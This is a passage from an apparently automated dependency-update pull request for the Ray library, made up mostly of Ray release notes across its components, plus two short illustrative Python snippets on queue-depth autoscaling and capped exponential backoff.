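class QueueDepthPolicy:
    """Hypothetical reusable autoscaling policy. In the scheme described
    above, the constructor arguments would arrive via `policy_kwargs`
    rather than a hand-rolled fork of the autoscaler."""

    def __init__(self, target_queue_len: int = 5, scale_step: int = 1):
        self.target_queue_len = target_queue_len
        self.scale_step = scale_step

    def decide(self, current_replicas: int, total_queued: int) -> int:
        """Return the desired replica count for the observed queue depth."""
        if current_replicas == 0:
            return self.scale_step if total_queued > 0 else 0
        per_replica = total_queued / current_replicas
        if per_replica > self.target_queue_len:
            return current_replicas + self.scale_step
        if per_replica < self.target_queue_len / 2 and current_replicas > 1:
            return current_replicas - self.scale_step
        return current_replicas
```

Packaging the logic as a class rather than a bare callback is what lets teams ship one policy and tune it per deployment through keyword arguments.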
##### 🔨 Fixes:
- Fixed a direct-ingress shutdown bug where replicas could hang
indefinitely while draining stuck requests, ensuring bounded shutdown
behavior in failure scenarios.
([#​60754](https://redirect.github.com/ray-project/ray/issues/60754))
- Fixed HAProxy reliability issues, including config race conditions,
draining guards, and platform compatibility edge cases, improving
stability in production rollouts.
([#​61120](https://redirect.github.com/ray-project/ray/issues/61120),
[#​60955](https://redirect.github.com/ray-project/ray/issues/60955))
- Fixed autoscaling correctness issues that could cause runaway scaling
or delayed reactions, including feedback-loop regressions, streaming
scale-down behavior, and wall-clock delay handling.
([#​61731](https://redirect.github.com/ray-project/ray/issues/61731),
[#​61920](https://redirect.github.com/ray-project/ray/issues/61920),
[#​62331](https://redirect.github.com/ray-project/ray/issues/62331),
[#​61844](https://redirect.github.com/ray-project/ray/issues/61844),
[#​60613](https://redirect.github.com/ray-project/ray/issues/60613))
- Fixed high-percentile latency regression in request routing and
queue-length accounting, reducing tail-latency spikes under load.
([#​61755](https://redirect.github.com/ray-project/ray/issues/61755))
- Fixed replica-state and health-state edge cases during migration and
ingress transitions, preventing false errors and unhealthy/healthy
misreporting.
([#​60365](https://redirect.github.com/ray-project/ray/issues/60365),
[#​61818](https://redirect.github.com/ray-project/ray/issues/61818),
[#​62213](https://redirect.github.com/ray-project/ray/issues/62213))
- Fixed chained upstream actor-failure handling so request failures are
attributed correctly and no longer hang when upstream deployments die
mid-chain.
([#​61758](https://redirect.github.com/ray-project/ray/issues/61758),
[#​62147](https://redirect.github.com/ray-project/ray/issues/62147))
- Fixed HTTP status classification for client disconnects after
successful responses, improving accuracy of error-rate monitoring and
alerting.
([#​61396](https://redirect.github.com/ray-project/ray/issues/61396))
##### 📖 Documentation:
- Added `AsyncInferenceAutoscalingPolicy` documentation and clarified
Serve performance guidance for HAProxy and inter-deployment gRPC use
cases.
([#​61086](https://redirect.github.com/ray-project/ray/issues/61086),
[#​61386](https://redirect.github.com/ray-project/ray/issues/61386))
- Updated scheduling and configuration docs, including replica
scheduling guidance and a catalog of Serve environment variables, so
operators can tune deployments with less guesswork.
([#​60922](https://redirect.github.com/ray-project/ray/issues/60922),
[#​60807](https://redirect.github.com/ray-project/ray/issues/60807))
- Clarified multiplexing and async behavior docs (including model
pre-warming constraints and request-cancel semantics) to prevent common
integration mistakes.
([#​61842](https://redirect.github.com/ray-project/ray/issues/61842),
[#​62280](https://redirect.github.com/ray-project/ray/issues/62280))
##### 🏗 Architecture refactoring:
- Refactored deployment-state execution to skip unnecessary steady-state
per-tick work, lowering control-loop churn and creating cleaner hooks
for future scheduling logic.
([#​60840](https://redirect.github.com/ray-project/ray/issues/60840))
- Moved autoscaling metric aggregation into Cython-backed paths and
added focused controller benchmarking, giving a stronger performance
baseline for future Serve controller changes.
([#​58892](https://redirect.github.com/ray-project/ray/issues/58892),
[#​61368](https://redirect.github.com/ray-project/ray/issues/61368))
- Simplified internal structure by migrating shared internals away from
private modules and consolidating replica abstractions, reducing
coupling and maintenance complexity.
([#​60849](https://redirect.github.com/ray-project/ray/issues/60849),
[#​61363](https://redirect.github.com/ray-project/ray/issues/61363),
[#​60198](https://redirect.github.com/ray-project/ray/issues/60198))
#### Ray Train
##### 🎉 New Features
- Elastic training: core capability, user guide, release tests,
multi-host TPU, telemetry
([#​60721](https://redirect.github.com/ray-project/ray/issues/60721),
[#​61115](https://redirect.github.com/ray-project/ray/issues/61115),
[#​61133](https://redirect.github.com/ray-project/ray/issues/61133),
[#​61299](https://redirect.github.com/ray-project/ray/issues/61299),
[#​61267](https://redirect.github.com/ray-project/ray/issues/61267))
- Add HF TRL (Transformer Reinforcement Learning) example
([#​61627](https://redirect.github.com/ray-project/ray/issues/61627))
- Add Tensor Parallel templates for DeepSpeed AutoTP and DTensor
([#​60160](https://redirect.github.com/ray-project/ray/issues/60160),
[#​60158](https://redirect.github.com/ray-project/ray/issues/60158))
- Add `status` attribute to `ReportedCheckpoint`
([#​61684](https://redirect.github.com/ray-project/ray/issues/61684))
- Richer Train run metadata
([#​59186](https://redirect.github.com/ray-project/ray/issues/59186))
- Add timers for Train worker initialization
([#​60870](https://redirect.github.com/ray-project/ray/issues/60870))
- Configure `torchft` environment
([#​61156](https://redirect.github.com/ray-project/ray/issues/61156))
##### 💫 Enhancements
- Register training resources with `AutoscalingCoordinator` in
`FixedScalingPolicy`
([#​61703](https://redirect.github.com/ray-project/ray/issues/61703))
- Decouple `datasets` field from `TrainRunContext`
([#​61953](https://redirect.github.com/ray-project/ray/issues/61953))
- Log warning for `checkpoint_upload_fn` when slow
([#​61720](https://redirect.github.com/ray-project/ray/issues/61720))
- Fix `StateManagerCallback` to accept datasets explicitly
([#​62042](https://redirect.github.com/ray-project/ray/issues/62042))
- Make train run abortable during `before_controller_shutdown`
([#​61816](https://redirect.github.com/ray-project/ray/issues/61816))
- Graceful abort catches all `RayActorError`
([#​61375](https://redirect.github.com/ray-project/ray/issues/61375))
- Refactor checkpoint and `sync_actor` to use `wait_with_logging`
([#​61063](https://redirect.github.com/ray-project/ray/issues/61063))
- Unwrap `UserExceptionWithTraceback` in
`WorkerGroupError.worker_failures`
([#​61153](https://redirect.github.com/ray-project/ray/issues/61153))
##### 🔨 Fixes
- Fix v2 `PlacementGroupCleaner` zombie actor
([#​61756](https://redirect.github.com/ray-project/ray/issues/61756))
- Fix checkpoint paths for multinode run
([#​61471](https://redirect.github.com/ray-project/ray/issues/61471))
- Abort cancels validation tasks with deterministic resumption
([#​61510](https://redirect.github.com/ray-project/ray/issues/61510))
- Fix deepspeed finetune release test
([#​61266](https://redirect.github.com/ray-project/ray/issues/61266))
##### 📖 Documentation
- Add section on async validation with experiment tracking
([#​62104](https://redirect.github.com/ray-project/ray/issues/62104))
- Add section on when to use async validation
([#​61702](https://redirect.github.com/ray-project/ray/issues/61702))
#### Ray Tune
##### 💫 Enhancements
- Remove deprecated `Logger` interface and `logger_creator`
([#​61181](https://redirect.github.com/ray-project/ray/issues/61181))
##### 🔨 Fixes
- Fix PBT trial order when `NaN` values are present
([#​57160](https://redirect.github.com/ray-project/ray/issues/57160))
#### Ray LLM
##### 🎉 New Features
- Replace `PDProxyServer` with decode-as-orchestrator PD architecture
([#​62076](https://redirect.github.com/ray-project/ray/issues/62076))
- Introduce DP group fault tolerance for WideEP deployments
([#​61480](https://redirect.github.com/ray-project/ray/issues/61480))
- SGLang engine: streaming chat/completions, tokenize/detokenize,
embeddings, multi-GPU TP/PP
([#​61236](https://redirect.github.com/ray-project/ray/issues/61236),
[#​61446](https://redirect.github.com/ray-project/ray/issues/61446),
[#​61159](https://redirect.github.com/ray-project/ray/issues/61159),
[#​61201](https://redirect.github.com/ray-project/ray/issues/61201),
[#​62221](https://redirect.github.com/ray-project/ray/issues/62221))
- Add `bundle_per_worker` config for simpler placement group setup
([#​59903](https://redirect.github.com/ray-project/ray/issues/59903))
- Separate Data and Serve LLM dashboards with improved panel visibility
([#​61037](https://redirect.github.com/ray-project/ray/issues/61037),
[#​62069](https://redirect.github.com/ray-project/ray/issues/62069))
##### 💫 Enhancements
- Promote Data LLM and Serve LLM APIs to beta
([#​61249](https://redirect.github.com/ray-project/ray/issues/61249),
[#​62054](https://redirect.github.com/ray-project/ray/issues/62054),
[#​62223](https://redirect.github.com/ray-project/ray/issues/62223))
- Upgrade vLLM to 0.16.0, 0.17.0, and 0.18.0
([#​61389](https://redirect.github.com/ray-project/ray/issues/61389),
[#​61598](https://redirect.github.com/ray-project/ray/issues/61598),
[#​61952](https://redirect.github.com/ray-project/ray/issues/61952))
- Upgrade NIXL to v1.0.0 and fix tensor transport issues
([#​61991](https://redirect.github.com/ray-project/ray/issues/61991))
- Unify duplicated `PlacementGroup` config schemes
([#​62241](https://redirect.github.com/ray-project/ray/issues/62241))
- Decouple Serve LLM ingress from vLLM protocol models
([#​61931](https://redirect.github.com/ray-project/ray/issues/61931))
- Set download task `num_cpus=0` to reduce contention on low-CPU
machines
([#​61191](https://redirect.github.com/ray-project/ray/issues/61191))
- SGLangServer cleanup and replace `format_messages_to_prompt` with
`_build_chat_messages`
([#​61117](https://redirect.github.com/ray-project/ray/issues/61117),
[#​61372](https://redirect.github.com/ray-project/ray/issues/61372))
##### 🔨 Fixes
- Fix duplicate `data: [DONE]` in streaming SSE responses
([#​62246](https://redirect.github.com/ray-project/ray/issues/62246))
- Fix `enable_log_requests=False` not forwarded to vLLM `AsyncLLM`
([#​60824](https://redirect.github.com/ray-project/ray/issues/60824))
- Fix `OpenAiIngress` scale-to-zero when all models set `min_replicas=0`
([#​60836](https://redirect.github.com/ray-project/ray/issues/60836))
- Handle missing state attributes from vLLM's task-conditional
`init_app_state`
([#​60812](https://redirect.github.com/ray-project/ray/issues/60812))
- Fix NIXL side channel host for cross-node P/D disaggregation
([#​60817](https://redirect.github.com/ray-project/ray/issues/60817))
- Fix `trust_remote_code` download
([#​60344](https://redirect.github.com/ray-project/ray/issues/60344))
- Avoid deprecated `TRANSFORMERS_CACHE`; treat HuggingFace config load
failure as non-fatal
([#​60854](https://redirect.github.com/ray-project/ray/issues/60854))
- Fix sequential batch processing in SGLangServer
([#​61189](https://redirect.github.com/ray-project/ray/issues/61189))
##### 📖 Documentation
- Update data parallel attention documentation
([#​61706](https://redirect.github.com/ray-project/ray/issues/61706))
- Add custom tokenizer example
([#​61098](https://redirect.github.com/ray-project/ray/issues/61098))
- Add C/C++ binaries incompatibility workaround
([#​62110](https://redirect.github.com/ray-project/ray/issues/62110))
#### Ray RLlib
##### 💫 Enhancements
- Connector/batching optimizations: ndarray fast paths, direct env step
pipeline, batch reuse
([#​61320](https://redirect.github.com/ray-project/ray/issues/61320),
[#​61255](https://redirect.github.com/ray-project/ray/issues/61255),
[#​61256](https://redirect.github.com/ray-project/ray/issues/61256),
[#​61259](https://redirect.github.com/ray-project/ray/issues/61259),
[#​61144](https://redirect.github.com/ray-project/ray/issues/61144))
- Unify default encoders for all algorithms
([#​60302](https://redirect.github.com/ray-project/ray/issues/60302))
- Toggle eval/train mode in `TorchRLModule` forward passes
([#​61985](https://redirect.github.com/ray-project/ray/issues/61985))
- Clean up offline prelearner and unit testing
([#​60632](https://redirect.github.com/ray-project/ray/issues/60632))
- Remove duplicate assignments in `AlgorithmConfig`
([#​61233](https://redirect.github.com/ray-project/ray/issues/61233))
- Remove legacy RLlib release tests
([#​59288](https://redirect.github.com/ray-project/ray/issues/59288))
- Add APPO example with Footsies environment
([#​59006](https://redirect.github.com/ray-project/ray/issues/59006))
##### 🔨 Fixes
- Support custom eval functions returning zero `eval_results`,
`env_steps`, or `agent_steps`
([#​61563](https://redirect.github.com/ray-project/ray/issues/61563))
- Fix `PrioritizedEpisodeReplayBuffer` bug
([#​60065](https://redirect.github.com/ray-project/ray/issues/60065))
- Fix missing `LayerNorm` in `RLModuleSpec`
([#​61025](https://redirect.github.com/ray-project/ray/issues/61025))
- Fix evaluation in parallel to training
([#​60777](https://redirect.github.com/ray-project/ray/issues/60777))
- Fix `MultiAgentEpisode.env_t_to_agent_t`
([#​60319](https://redirect.github.com/ray-project/ray/issues/60319))
- Fix default metric during eval
([#​61590](https://redirect.github.com/ray-project/ray/issues/61590))
- Fix incorrect log value of environment steps sampled/trained
([#​56599](https://redirect.github.com/ray-project/ray/issues/56599))
- Prevent `torch_learner.py` crash under parameter-freezing edge cases
([#​62158](https://redirect.github.com/ray-project/ray/issues/62158))
#### Ray Core
##### 🎉 New Features
- Resource isolation: pressure-based memory monitor, time-based killing,
cgroup constraints
([#​61361](https://redirect.github.com/ray-project/ray/issues/61361),
[#​61323](https://redirect.github.com/ray-project/ray/issues/61323),
[#​61097](https://redirect.github.com/ray-project/ray/issues/61097),
[#​61210](https://redirect.github.com/ray-project/ray/issues/61210),
[#​61297](https://redirect.github.com/ray-project/ray/issues/61297),
[#​59365](https://redirect.github.com/ray-project/ray/issues/59365),
[#​59368](https://redirect.github.com/ray-project/ray/issues/59368),
[#​60752](https://redirect.github.com/ray-project/ray/issues/60752))
- IPPR: add `ResizeRayletResourceInstances` to GCS/Python client,
schema/status models, KubeRay provider
([#​61654](https://redirect.github.com/ray-project/ray/issues/61654),
[#​61666](https://redirect.github.com/ray-project/ray/issues/61666),
[#​61803](https://redirect.github.com/ray-project/ray/issues/61803),
[#​61814](https://redirect.github.com/ray-project/ray/issues/61814))
- Add `PlatformEvent` proto and placement group events in one-event
framework
([#​61701](https://redirect.github.com/ray-project/ray/issues/61701),
[#​60449](https://redirect.github.com/ray-project/ray/issues/60449))
- Add Nvidia B300 support
([#​60753](https://redirect.github.com/ray-project/ray/issues/60753))
- Add UV support for Ray Client mode
([#​60868](https://redirect.github.com/ray-project/ray/issues/60868))
- Add `Percentile` metric type backed by quadratic histogram
([#​61148](https://redirect.github.com/ray-project/ray/issues/61148))
- Expose `fallback_strategy` in `TaskInfoEntry` and `ActorTableData`
([#​60659](https://redirect.github.com/ray-project/ray/issues/60659))
- Add submission job proto changes
([#​60857](https://redirect.github.com/ray-project/ray/issues/60857))
- Add TPU util for ready multi-host slice count; simplify elastic TPU
scaling
([#​61300](https://redirect.github.com/ray-project/ray/issues/61300),
[#​62141](https://redirect.github.com/ray-project/ray/issues/62141))
- Introduce per-node level temp-dir
([#​60761](https://redirect.github.com/ray-project/ray/issues/60761))
- Make `ray.put()` generic: `put(value: R) -> ObjectRef[R]`
([#​60995](https://redirect.github.com/ray-project/ray/issues/60995))
- Add Python 3.14 support for recursion limit handling
([#​58459](https://redirect.github.com/ray-project/ray/issues/58459))
##### 💫 Enhancements
- Upgrade `cloudpickle` to 3.1.2, gRPC to v1.58.0, protobuf to 3.20.3
([#​60317](https://redirect.github.com/ray-project/ray/issues/60317),
[#​61499](https://redirect.github.com/ray-project/ray/issues/61499),
[#​60736](https://redirect.github.com/ray-project/ray/issues/60736))
- Multiple gRPC connections for improved object transfer throughput,
enabled by default
([#​61121](https://redirect.github.com/ray-project/ray/issues/61121),
[#​61440](https://redirect.github.com/ray-project/ray/issues/61440))
- Improve `pg.ready()` performance via async GCS RPC; fix deadlocks
([#​60657](https://redirect.github.com/ray-project/ray/issues/60657),
[#​62086](https://redirect.github.com/ray-project/ray/issues/62086))
- RDT: non-torch transfers, PyTorch storage caching, metadata caching,
NIXL agent reuse
([#​61081](https://redirect.github.com/ray-project/ray/issues/61081),
[#​60999](https://redirect.github.com/ray-project/ray/issues/60999),
[#​60689](https://redirect.github.com/ray-project/ray/issues/60689),
[#​60602](https://redirect.github.com/ray-project/ray/issues/60602))
- Cache `ActorHandle.__hash__` and fix `__eq__` correctness
([#​61638](https://redirect.github.com/ray-project/ray/issues/61638))
- Cache `find_gcs_addresses`
([#​61065](https://redirect.github.com/ray-project/ray/issues/61065))
- Optimize worker listener thread
([#​61353](https://redirect.github.com/ray-project/ray/issues/61353))
- Eliminate Python GCS client from state manager `get_all_node_info`
([#​61232](https://redirect.github.com/ray-project/ray/issues/61232))
- Loosen restriction on worker thread count
([#​62279](https://redirect.github.com/ray-project/ray/issues/62279))
- Sequence in-order actor tasks per concurrency group instead of
globally
([#​61082](https://redirect.github.com/ray-project/ray/issues/61082))
- Prioritize killing workers that occupy large memory in OOM killer
([#​60330](https://redirect.github.com/ray-project/ray/issues/60330))
- Cap exponential backoff attempt number to prevent integer overflow
([#​61003](https://redirect.github.com/ray-project/ray/issues/61003))
- Replace deprecated threading APIs (`getName`/`setDaemon`)
([#​62153](https://redirect.github.com/ray-project/ray/issues/62153))
- Improve error handling for `@ray.remote`/`@ray.method` with
`num_returns`
([#​59286](https://redirect.github.com/ray-project/ray/issues/59286))
- Convert `StopIteration` on non-generator functions to `RuntimeError`
([#​60521](https://redirect.github.com/ray-project/ray/issues/60521))
- Surface warnings for scheduling rate limits slowing task ramp-up
([#​61004](https://redirect.github.com/ray-project/ray/issues/61004))
- Periodically reload service account tokens; use
`AuthenticationValidator` in sync server
([#​60778](https://redirect.github.com/ray-project/ray/issues/60778),
[#​60779](https://redirect.github.com/ray-project/ray/issues/60779))
- Remove support for `local_mode`
([#​60647](https://redirect.github.com/ray-project/ray/issues/60647))
- Allow matching `worker_process_setup_hook` on re-entry
([#​61473](https://redirect.github.com/ray-project/ray/issues/61473))
- Reduce default event aggregator buffer size to avoid OOM
([#​60826](https://redirect.github.com/ray-project/ray/issues/60826))
- Suppress autoscaler action logs for read-only provider
([#​61732](https://redirect.github.com/ray-project/ray/issues/61732))
- Lazy subscription to node changes on non-driver workers
([#​61118](https://redirect.github.com/ray-project/ray/issues/61118))
- Tighten export symbol allowlists to prevent non-ray symbol leakage
([#​61298](https://redirect.github.com/ray-project/ray/issues/61298))
- Approximate USS from `memory_info` instead of calling
`memory_full_info`
([#​60000](https://redirect.github.com/ray-project/ray/issues/60000))
- Dedicated IO context for `NodeManager` and `InternalKVManager`
([#​61002](https://redirect.github.com/ray-project/ray/issues/61002))
- Print gRPC peer address on GCS
`HandleUnregisterNode`/`HandleDrainNode`
([#​62226](https://redirect.github.com/ray-project/ray/issues/62226),
[#​62112](https://redirect.github.com/ray-project/ray/issues/62112))
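The backoff-cap item above addresses a classic bug: computing `base * 2**attempt` overflows once the attempt count grows without bound. A toy sketch of the capped form (the constants and function name are made up for illustration; Ray's actual implementation lives in its C++ core):

```python
MAX_BACKOFF_SHIFT = 20  # cap the exponent so the shift can never overflow

def backoff_ms(attempt: int, base_ms: int = 100, max_ms: int = 30_000) -> int:
    """Exponential backoff whose attempt number is capped before shifting."""
    shift = min(attempt, MAX_BACKOFF_SHIFT)
    return min(base_ms * (1 << shift), max_ms)
```

Without the `min` on `shift`, a long-retrying task would eventually evaluate `1 << attempt` for an arbitrarily large attempt count, which in fixed-width integer code means wraparound or undefined behavior.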
##### 🔨 Fixes
- Fix task stuck when pop worker repeatedly fails
([#​60104](https://redirect.github.com/ray-project/ray/issues/60104))
- Fix `bool` env var parsing for `RAY_CGRAPH_overlap_gpu_communication`
([#​61421](https://redirect.github.com/ray-project/ray/issues/61421))
- Fix negative RUNNING task metric
([#​62070](https://redirect.github.com/ray-project/ray/issues/62070))
- Fix `OnNodeDead` to destroy all owned actors when owner node dies
([#​60669](https://redirect.github.com/ray-project/ray/issues/60669))
- Fix actor task queue blocked after cancelling head task
([#​60850](https://redirect.github.com/ray-project/ray/issues/60850))
- Fix `TASK_PROFILE_EVENT` aggregation for multiple phases
([#​61559](https://redirect.github.com/ray-project/ray/issues/61559))
- Fix double-counting in `WorkerPool::WarnAboutSize()`
([#​61246](https://redirect.github.com/ray-project/ray/issues/61246))
- Fix `TaskLifecycleEvent.node_id` using emitting node instead of
executor
([#​61478](https://redirect.github.com/ray-project/ray/issues/61478))
- Fix `publisher_id` type mismatch in GCS pubsub
([#​61518](https://redirect.github.com/ray-project/ray/issues/61518))
- Fix `dataclass.asdict` with `None` in dashboard `list_jobs` API
([#​61033](https://redirect.github.com/ray-project/ray/issues/61033))
- Fix dashboard node head API dead node cache
([#​61185](https://redirect.github.com/ray-project/ray/issues/61185))
- Fix dashboard event agent for events without HTTP scheme
([#​60811](https://redirect.github.com/ray-project/ray/issues/60811))
- Fix Ray Actor typing for async methods
([#​60682](https://redirect.github.com/ray-project/ray/issues/60682))
- Fix autoscaler retry during k8s exceptions
([#​60658](https://redirect.github.com/ray-project/ray/issues/60658))
- Fix `ReadOnlyPro…`
</details>
---
### Configuration
📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).
🚦 **Automerge**: Enabled.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/vortex-data/vortex).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNDEuMyIsInVwZGF0ZWRJblZlciI6IjQzLjE0MS4zIiwidGFyZ2V0QnJhbmNoIjoiZGV2ZWxvcCIsImxhYmVscyI6WyJjaGFuZ2Vsb2cvY2hvcmUiXX0=-->
---------
Signed-off-by: Robert Kruszewski <github@robertk.io>
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Robert Kruszewski <github@robertk.io>
3 files changed: 26 additions, 21 deletions.